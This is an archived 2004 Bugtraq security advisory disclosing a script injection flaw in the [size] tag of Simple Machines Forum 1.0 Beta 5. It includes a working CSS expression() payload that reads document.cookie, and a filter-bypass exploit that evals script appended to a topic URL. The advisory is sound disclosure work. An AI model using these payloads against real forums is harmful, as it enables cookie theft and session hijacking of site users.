lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 5 May 2004 12:28:00 -0000
From: Cheng Peng Su <apple_soup@....com>
To: bugtraq@...urityfocus.com
Subject: SMF SIZE Tag Script Injection Vulnerability




############################################################################

  Advisory Name : SMF SIZE Tag Script Injection Vulnerability
   Release Date : May 3,2004 
    Application : Simple Machines
        Test On : SMF 1.0 Beta 5 Public
     Vendor URL : http://www.simplemachines.org/
       Discover : Cheng Peng Su(apple_soup_at_msn.com)
     
############################################################################

 Intro:
       The team that has brought you YaBB SE has moved on to develop 
  the next evolution in forum software, Simple Machines Forum(SMF).
  They have rebranded themselves under the name Simple Machines.They
  said proudly that "SMF is a next-generation community software package
  and is jam-packed with features, while at the same time having a minimal
  impact on resources."
   
 Proof of conecpt:
       SMF doesn't filter scripting code strictly in the [size] tags,
  in other words,they forget to filter ()+ characters.Attacker can use
  the expression() syntax to set an malicious expression on font-size
  attribute.The code below is available.
  
     [size=expression(alert(document.cookie))]Just beginning[/size]
     
  but if you start complex code,you will know that some characters
  (such as quote,apostrophe and semicolon) are filtered by SMF, but 
  I found an available way without quote,apostrophe or semicolon, you
  will know this way from the Exploit below.
  
 Exploit:
       First,submit specially content like below
       
  [size=expression(eval(unescape(document.URL.substring(document.URL.
  length-41,document.URL.length))))]Big Exploit[/size]
 
  '41' in the content means the length of the malicious scripting.
  If the URL of the Topic above is
  
  http://site/index.php?topic=12345.0
  
  Make a link with malicious scripting like this:
  
  http://site/index.php?topic=12345.0&alert('Your cookie:\n'+document.
  cookie)
 
 Solution:
       SMF were notified and there may will be a release of a fix or update
  to resolve these issues. Who knows, maybe they don't care this' bug.

 Contact:
  apple_soup_at_msn.com
  Cheng Peng Su
  Class 1,Senior 2, High school attached to Wuhan University
  Wuhan,Hubei,China(430072)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ